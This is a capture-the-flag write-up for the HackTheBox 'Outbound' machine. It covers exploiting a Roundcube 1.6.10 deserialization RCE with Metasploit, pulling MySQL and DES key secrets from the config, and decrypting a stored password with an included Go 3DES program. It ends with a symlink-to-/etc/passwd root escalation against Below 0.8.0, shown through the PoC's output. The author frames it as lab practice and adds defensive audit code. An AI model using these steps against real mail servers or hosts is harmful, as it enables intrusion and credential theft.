Outbound Writeup (HackTheBox Easy Machine)
As is common in real-life pentests, you start the Outbound box with credentials for the following account: tyler / LhKL1o9Nm3X2
Overview
Outbound is an easy Linux machine from HackTheBox. This box depends heavily on enumeration and on looking for the smallest pieces of information. It also has several cool vulnerabilities.
We start by identifying a vulnerable Roundcube Webmail web app, which we exploit to get an initial foothold. We find credentials for the MySQL database and discover some auth secrets. Combining all of the found information, we decrypt a password for a higher-privileged user.
During the final privilege escalation, we once again find a vulnerable software version and use a local privilege escalation exploit to get root and ultimately pwn the machine.
Nmap scan
Starting with the Nmap scan.
┌──(root㉿kali)-[/home/kali]
└─# nmap -A 10.10.11.77 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 12:59 CEST
Warning: 10.10.11.77 giving up on port because retransmission cap hit (2).
Nmap scan report for outbound.htb (10.10.11.77)
Host is up (0.036s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
32783/tcp filtered unknown
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 30.77 ms 10.10.14.1
2 30.84 ms outbound.htb (10.10.11.77)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds
The Nmap scan showed two open ports: 22 for SSH and 80 for an Nginx web server. Don’t forget to add “outbound.htb” and “mail.outbound.htb” (see the Nmap scan) to your “/etc/hosts” file.
Web enumeration
I visited the website and got hit with Roundcube Webmail login page.

Using given credentials, I logged in as “tyler”.
I looked around a bit, seeing no sent or received mails and no contacts. Next, I clicked the About button and found that version 1.6.10 of Roundcube Webmail was being used, as well as a couple of installed plugins and their associated versions.
(screenshot: version disclosure)
So I did a little research on Roundcube 1.6.10. It turned out that this version has an RCE vulnerability.

Exploiting Roundcube RCE vulnerability & getting initial foothold with Metasploit
Luckily for us, there is a dedicated Metasploit module for this vulnerability, making the exploitation process a lot easier. It’s a post-auth RCE via PHP object deserialization.
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization. (Metasploit)

We need to set the correct credentials, the remote host (“mail.outbound.htb”, not the IP address, as I set at first) and our local host (the OpenVPN IP address). After that’s done, we can run the exploit, wait a couple of seconds and get a Meterpreter session on the machine as “www-data”.

Found MySQL credentials, accessing Roundcube database & discovering secrets
I launched a shell and immediately noticed that we are in a Docker container. That means we don’t have access to the host machine itself, only to what has been mounted into this container.

As I usually do when I get a shell, I first poked around the filesystem. I looked for config files, log files, vulnerable kernel or software versions, permissions, etc.
After a bit of digging, I found a config file with MySQL credentials for the Roundcube database inside the “/var/www/html” directory, which is where web files usually live.
(screenshot: MySQL credentials found in Roundcube config file)
If we look below, we can find more secrets. We can find the DES key, which will be important later.
(screenshot: DES key found in Roundcube config file)
MySQL was present in the container, so I logged in and found password hashes for 3 users. Since there was no Python, I was using an unstable shell, so the output looks a little odd because I had to cause an error for it to appear.
It’s hard to say what type of hashes those are. I tried to crack them with CrackStation and Hashcat but had no luck.

I also looked at other tables in the database. There was another interesting table named “session”, which contained a lot of base64-encoded strings.

So I opened CyberChef and decoded them. After decoding, I found some very valuable information: a record for user “jacob” with “auth_secret” and “password” attributes.
(screenshot: encryption secrets found after decoding)
Decrypting DES cipher, getting passwords for user “jacob” & getting user flag
Now that we know such sensitive information as the “auth_secret”, we may be able to decrypt Jacob’s password and compromise his user account. Recollecting everything we know, we have Jacob’s secrets and the DES key (remember, from the Roundcube config file).
DES key - rcmail-!24ByteDESkey*Str
auth_secret - DpYqv6maI9HxDL5GhcCd8JaQQW
password - L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
And since I knew nothing about the DES cipher and its decryption, I had to do a bit of googling. Luckily, I found a couple of good resources (https://www.roundcubeforum.net/index.php?topic=23399.0, https://www.youtube.com/watch?v=4R_kocR1roM) that explained the topic very well. If you’re interested, you can check them out. If not, I’ll still guide you through the process.
First of all, we have to base64-decode the “password” attribute. Then we convert it to hex (for convenience) and split it into two parts: the first 8 bytes (highlighted) and the rest of the string.

Next, we open another CyberChef tab and find the Triple DES Decrypt recipe. Since the key is 24 bytes long, we can assume that we are working with 3DES.
We fill our DES key (from the Roundcube config) into the “Key” field, the first 8 bytes from the previous step into the “IV” (Initialization Vector) field, and finally supply the rest of the password string (all in hex) as the input. We should end up with the decrypted password.
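The CyberChef recipe above is the manual form of a simple scheme: the stored value is base64 of an 8-byte IV followed by 3DES-CBC ciphertext under the 24-byte des_key. The Go program below is an added example written for this writeup (it is not Roundcube’s code, nor the author’s) that implements that layout, splits the page’s session value into IV and ciphertext the same way, and checks a round trip on a constructed secret. The padding mode is an assumption (PKCS#7, OpenSSL’s default). The defender’s takeaway is that the key string in the box’s config is also the value Roundcube ships as its default des_key, so anyone who can read the config or simply knows the default can decrypt every stored session password; change it from the default and protect it like a password.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/rand"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
)

// Layout reconstructed from the CyberChef steps:
//   base64( IV[8] || 3DES-CBC(des_key, pad(plaintext)) )
// PKCS#7 padding is an assumption here; this is an added illustration, not Roundcube's code.

const blockSize = des.BlockSize // 8 bytes for DES/3DES

// pkcs7Pad appends n bytes of value n so the length is a multiple of the block size.
func pkcs7Pad(b []byte) []byte {
	n := blockSize - len(b)%blockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad validates and strips the padding added by pkcs7Pad.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%blockSize != 0 {
		return nil, errors.New("plaintext length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > blockSize {
		return nil, errors.New("invalid padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid padding")
		}
	}
	return b[:len(b)-n], nil
}

// SplitIV returns the IV and ciphertext (hex-encoded) of a base64 value:
// exactly the two fields that go into the CyberChef recipe.
func SplitIV(encoded string) (ivHex, ctHex string, err error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", "", err
	}
	if len(raw) < 2*blockSize || len(raw)%blockSize != 0 {
		return "", "", errors.New("value is too short or not block-aligned")
	}
	return hex.EncodeToString(raw[:blockSize]), hex.EncodeToString(raw[blockSize:]), nil
}

// Decrypt splits off the IV, runs 3DES-CBC with the 24-byte des_key and unpads.
func Decrypt(desKey []byte, encoded string) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*blockSize || len(raw)%blockSize != 0 {
		return nil, errors.New("value is too short or not block-aligned")
	}
	block, err := des.NewTripleDESCipher(desKey) // requires exactly 24 bytes
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:blockSize], raw[blockSize:]
	clear := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(clear, ct)
	return pkcs7Unpad(clear)
}

// Encrypt is the forward direction, included so the round trip can be checked offline.
func Encrypt(desKey []byte, clear []byte) (string, error) {
	block, err := des.NewTripleDESCipher(desKey)
	if err != nil {
		return "", err
	}
	iv := make([]byte, blockSize)
	if _, err := rand.Read(iv); err != nil {
		return "", err
	}
	padded := pkcs7Pad(clear)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(iv, ct...)), nil
}

func main() {
	// Key from the box's config file; it is also Roundcube's shipped default des_key.
	key := []byte("rcmail-!24ByteDESkey*Str")

	// The stored "password" value from the session table, split as the writeup does by hand.
	iv, ct, err := SplitIV("L7Rv00A8TuwJAr67kITxxcSgnIk25Am/")
	fmt.Println("IV:", iv, "ciphertext:", ct, "err:", err)

	// Round trip on a constructed secret (not a value from the box).
	enc, _ := Encrypt(key, []byte("constructed-example"))
	dec, err := Decrypt(key, enc)
	fmt.Printf("round trip: %q err=%v\n", dec, err)
}
```

The IV the program prints for the page’s value is the same 8 bytes the writeup highlights in CyberChef; the remaining 16 bytes are the ciphertext. Rotating des_key invalidates the values already stored in the session table, which is the intended effect.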

Bingo! We got Jacob’s password. I tried the creds on SSH, but no luck there. Then I tried them on Roundcube Webmail… success! There were some mails in the inbox.

The first mail was from Tyler, who gave us another password for Jacob.
(screenshot: mail from Tyler)
The second mail was from Mel, which informs us that Jacob has the privilege to inspect resource monitoring logs with Below.
“Below” is a modern, “time-traveling” Linux resource monitoring tool that provides historical data for debugging and analysis. Unlike traditional monitors, Below captures all system data and allows you to replay it later, providing a deeper understanding of resource issues over time. (Gemini)
(screenshot: mail from Mel)
We can use the password from the first mail to log in via SSH as “jacob”. The user flag sits in his home directory.
jacob@outbound:~$ ls -la
total 28
drwxr-x--- 3 jacob jacob 4096 Jul 8 20:14 .
drwxr-xr-x 5 root root 4096 Jul 8 20:14 ..
lrwxrwxrwx 1 root root 9 Jul 8 11:12 .bash_history -> /dev/null
-rw-r--r-- 1 jacob jacob 220 Jun 8 12:14 .bash_logout
-rw-r--r-- 1 jacob jacob 3771 Jun 8 12:14 .bashrc
drwx------ 2 jacob jacob 4096 Jun 11 11:32 .cache
-rw-r--r-- 1 jacob jacob 807 Jun 8 12:14 .profile
-rw-r----- 1 root jacob 33 Sep 3 04:02 user.txt
Exploiting misconfiguration in Below & getting root flag
I went down my usual privilege escalation checklist. When I checked Jacob’s sudo permissions, I found that I can run the Below binary with elevated privileges, with only a couple of exceptions.
jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jacob may run the following commands on outbound:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
Using the “find” tool, I checked where Below-related files are present.
jacob@outbound:~$ find / -name below 2>/dev/null
/sys/devices/system/cpu/cpu1/cpuidle/state1/below
/sys/devices/system/cpu/cpu1/cpuidle/state0/below
/sys/devices/system/cpu/cpu0/cpuidle/state1/below
/sys/devices/system/cpu/cpu0/cpuidle/state0/below
/var/log/below
/opt/below
/opt/below/target/release/below
/opt/below/below
/usr/bin/below
Looking at the “/opt” directory, I found a config file which showed Below version 0.8.0.

I googled “Below 0.8.0 exploit” and found this GitHub repo with a PoC Python script: https://github.com/BridgerAlderson/CVE-2025-27591-PoC.

The weak spot is the world-writable “/var/log/below” directory.
jacob@outbound:/var/log$ ls -la | grep below
drwxrwxrwx 3 root root 4096 Sep 3 06:04 below
We, as attackers, can symlink a Below log file to any root-owned file like “/etc/passwd”. This allows us to write to such files and potentially gain root privileges. Here’s an explanation from another repo:

So I downloaded the Python exploit, transferred it to the target machine and ran it.
jacob@outbound:/tmp$ python3 exploit.py
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] /var/log/below/error_root.log is a regular file. Removing it...
[+] Symlink created: /var/log/below/error_root.log -> /etc/passwd
[+] Target is vulnerable.
[*] Starting exploitation...
[+] Wrote malicious passwd line to /tmp/attacker
[+] Symlink set: /var/log/below/error_root.log -> /etc/passwd
[*] Executing 'below record' as root to trigger logging...
Sep 03 06:03:00.263 DEBG Starting up!
Sep 03 06:03:00.264 ERRO
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01756857600: EAGAIN: Try again
-------------------------------------------------------------
[+] 'below record' executed.
[*] Appending payload into /etc/passwd via symlink...
[+] Payload appended successfully.
[*] Attempting to switch to root shell via 'su attacker'...
root@outbound:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
The root flag waits patiently in the “/root” directory.

And that’s the Outbound machine done!
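From the defender’s side, the root cause of the Below escalation is a log directory that everyone can write into while a root process writes there, so a log name can be turned into a symlink to a root-owned file. The Go program below is an added example (not part of this writeup and not the Below project’s code) that audits such a directory for exactly those two conditions: a world-writable directory without the sticky bit, and symlinks inside it that resolve outside the directory or dangle. The default path “/var/log/below” is the one from the writeup; any other directory can be passed as the first argument.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Finding is one weakness reported for a privileged log directory.
type Finding struct {
	Path   string
	Reason string
}

// AuditLogDir inspects a directory that a root-run tool writes log files into and reports
// the two conditions the Below misconfiguration combines: the directory being writable by
// everyone without the sticky bit, and symlinks inside it that resolve outside the directory
// (or dangle), which would let a privileged writer be redirected to an arbitrary file.
func AuditLogDir(dir string) ([]Finding, error) {
	absDir, err := filepath.Abs(dir)
	if err != nil {
		return nil, err
	}
	// Resolve the directory itself so that targets inside it compare cleanly.
	absDir, err = filepath.EvalSymlinks(absDir)
	if err != nil {
		return nil, err
	}
	info, err := os.Lstat(absDir)
	if err != nil {
		return nil, err
	}
	if !info.IsDir() {
		return nil, fmt.Errorf("%s is not a directory", absDir)
	}

	var findings []Finding
	mode := info.Mode()
	if mode.Perm()&0o002 != 0 && mode&os.ModeSticky == 0 {
		findings = append(findings, Finding{absDir,
			fmt.Sprintf("world-writable without sticky bit (mode %04o)", mode.Perm())})
	}

	entries, err := os.ReadDir(absDir)
	if err != nil {
		return nil, err
	}
	for _, e := range entries {
		if e.Type()&os.ModeSymlink == 0 {
			continue // regular files and subdirectories are not the concern here
		}
		p := filepath.Join(absDir, e.Name())
		target, err := filepath.EvalSymlinks(p)
		if err != nil {
			findings = append(findings, Finding{p, "dangling symlink: " + err.Error()})
			continue
		}
		if !strings.HasPrefix(target, absDir+string(os.PathSeparator)) {
			findings = append(findings, Finding{p, "symlink resolves outside the directory: " + target})
		}
	}
	return findings, nil
}

func main() {
	dir := "/var/log/below" // path from the writeup; pass another directory as the first argument
	if len(os.Args) > 1 {
		dir = os.Args[1]
	}
	findings, err := AuditLogDir(dir)
	if err != nil {
		fmt.Fprintln(os.Stderr, "audit failed:", err)
		os.Exit(2)
	}
	for _, f := range findings {
		fmt.Printf("%s: %s\n", f.Path, f.Reason)
	}
	if len(findings) == 0 {
		fmt.Println("no findings")
	}
}
```

The fix the audit points at is the conventional one: the directory owned by root with mode 0755 (or, where unprivileged writers are genuinely needed, 1777 so only the owner can replace an entry), and the privileged writer opening its log files with O_NOFOLLOW so a planted symlink fails instead of being followed.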
Summary & final thoughts
Outbound is an easy but tricky Linux machine from HackTheBox. This box has several interesting vulnerabilities. If we want to find them, we have to perform deep enumeration and look mainly for software versions. We log into Roundcube Webmail and exploit an RCE vulnerability to get a shell, but we land in a Docker container. So we find credentials for the MySQL database and discover encoded auth secrets and keys. We use all of this information to decrypt a DES cipher and get the password for another user. We inspect the interesting Below software and find a misconfiguration that causes a critical vulnerability. We exploit it to escalate to root.
In my opinion, this machine has some good and straightforward attack paths, if you’re good at enumeration. The DES decryption part, though, can get tricky if you have zero experience with it (like I had). Overall, a very solid and enjoyable machine without anything being too confusing. Both beginner and intermediate cybersecurity enthusiasts should be good to go.